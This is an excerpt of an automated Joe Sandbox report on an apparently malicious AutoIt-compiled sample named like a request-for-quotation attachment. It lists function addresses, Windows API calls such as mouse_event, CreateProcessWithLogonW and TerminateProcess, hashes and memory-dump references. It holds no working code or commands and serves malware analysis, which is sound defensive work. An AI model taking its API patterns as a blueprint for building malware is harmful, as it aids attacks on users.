Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B

Function 00401765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
GetWindowRect.USER32(?,?), ref: 004017FE
ScreenToClient.USER32(?,?), ref: 0040181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
EndPaint.USER32(?,?), ref: 00401876

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A

Function 0048B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004C57B0,00000000,00C11C90,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
EnableWindow.USER32(00000000,00000000), ref: 0048B736
ShowWindow.USER32(004C57B0,00000000,00C11C90,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94

Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC

Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3

GetDesktopWindow.USER32 ref: 004770D6
GetWindowRect.USER32(00000000), ref: 004770DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F

Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC

GetCursorPos.USER32(?), ref: 0047713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A

Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
HeapAlloc.KERNEL32(00000000), ref: 004588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
HeapFree.KERNEL32(00000000), ref: 00458911

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69

Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
CloseHandle.KERNEL32(00000004), ref: 00458603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64

Function 0045B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0045B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94

Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5

Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9

Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00467243
EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E

Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59

Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
UnloadUserProfile.USERENV(?,?), ref: 004589A9
CloseHandle.KERNEL32(?), ref: 004589B2
CloseHandle.KERNEL32(?), ref: 004589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
HeapFree.KERNEL32(00000000), ref: 004589CA

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58

Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
_memcmp.LIBCMT ref: 00457748

Strings

,,I, xrefs: 0045753D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,I
API String ID: 314563124-4163367948
Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64

Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00478613
CharUpperBuffW.USER32(?,?), ref: 00478722
VariantClear.OLEAUT32(?), ref: 0047889A

Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7

Strings

AUTOIT.ERROR, xrefs: 00478728
Incorrect Parameter format, xrefs: 0047864B, 0047880D

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
Opcode Fuzzy Hash: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56

Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_memset.LIBCMT ref: 00462B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97

Strings

0, xrefs: 00462B73

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 0a96add73e910398c50c240935908b535ad52267fbfe38cc3b497cdc09e37aa3
Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
Opcode Fuzzy Hash: 0a96add73e910398c50c240935908b535ad52267fbfe38cc3b497cdc09e37aa3
Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B

Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00413277
_memmove.LIBCMT ref: 00413310
_free.LIBCMT ref: 00413336
_memmove.LIBCMT ref: 004133E9

Strings

3cA, xrefs: 00413225
_A, xrefs: 00413322

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cA$_A
API String ID: 2620147621-3480954128
Opcode ID: f7f7aa10a2776cebec5ab41bedefafc6019a57301ab68c68974e4ad1fc490e58
Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
Opcode Fuzzy Hash: f7f7aa10a2776cebec5ab41bedefafc6019a57301ab68c68974e4ad1fc490e58
Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A

